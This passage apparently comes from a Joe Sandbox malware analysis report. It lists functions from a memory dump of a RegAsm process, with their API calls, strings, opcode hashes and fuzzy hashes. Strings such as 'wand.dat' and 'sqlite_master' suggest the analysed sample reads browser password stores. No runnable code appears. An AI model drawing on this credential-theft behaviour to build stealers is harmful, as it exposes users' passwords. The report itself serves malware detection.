                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                • String ID: </%s>
                                                                                                                                                                                • API String ID: 3400436232-259020660
                                                                                                                                                                                • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                • String ID: caption
                                                                                                                                                                                • API String ID: 1523050162-4135340389
                                                                                                                                                                                • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                                • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                                Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                • String ID: MS Sans Serif
                                                                                                                                                                                • API String ID: 210187428-168460110
                                                                                                                                                                                • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                • String ID: edit
                                                                                                                                                                                • API String ID: 2747424523-2167791130
                                                                                                                                                                                • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                                                • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                                                Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                                                • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                                                • memcmp.MSVCRT ref: 0041D8CB
                                                                                                                                                                                • memcmp.MSVCRT ref: 0041D913
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memcmp
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3384217055-0
                                                                                                                                                                                • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                                • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                                Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 368790112-0
                                                                                                                                                                                • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                                • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                                Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1889144086-0
                                                                                                                                                                                • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                                                • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                                                Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1661045500-0
                                                                                                                                                                                • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                                • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                                Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                                                                                Strings
                                                                                                                                                                                • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                • API String ID: 1297977491-2063813899
                                                                                                                                                                                • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                                • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                                Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                • String ID: *.*$dat$wand.dat
                                                                                                                                                                                • API String ID: 2618321458-1828844352
                                                                                                                                                                                • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1549203181-0
                                                                                                                                                                                • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                                • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                                                Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00412057
                                                                                                                                                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3550944819-0
                                                                                                                                                                                • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • free.MSVCRT ref: 0040F561
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$free
                                                                                                                                                                                • String ID: g4@
                                                                                                                                                                                • API String ID: 2888793982-2133833424
                                                                                                                                                                                • Opcode ID: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                                                                                                                                                                                • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                • Opcode Fuzzy Hash: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                                                                                                                                                                                • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: @
                                                                                                                                                                                • API String ID: 3510742995-2766056989
                                                                                                                                                                                • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AF07
                                                                                                                                                                                • memset.MSVCRT ref: 0040AF18
                                                                                                                                                                                • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1865533344-0
                                                                                                                                                                                • Opcode ID: 656bc52577548dce7c664571d44393d4b9863a75184cdcc152229e984c3c4871
                                                                                                                                                                                • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                • Opcode Fuzzy Hash: 656bc52577548dce7c664571d44393d4b9863a75184cdcc152229e984c3c4871
                                                                                                                                                                                • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                  • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1127616056-0
                                                                                                                                                                                • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                                                • memset.MSVCRT ref: 0042FED3
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                • String ID: sqlite_master
                                                                                                                                                                                • API String ID: 438689982-3163232059
                                                                                                                                                                                • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3917621476-0
                                                                                                                                                                                • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                                                • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                                Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
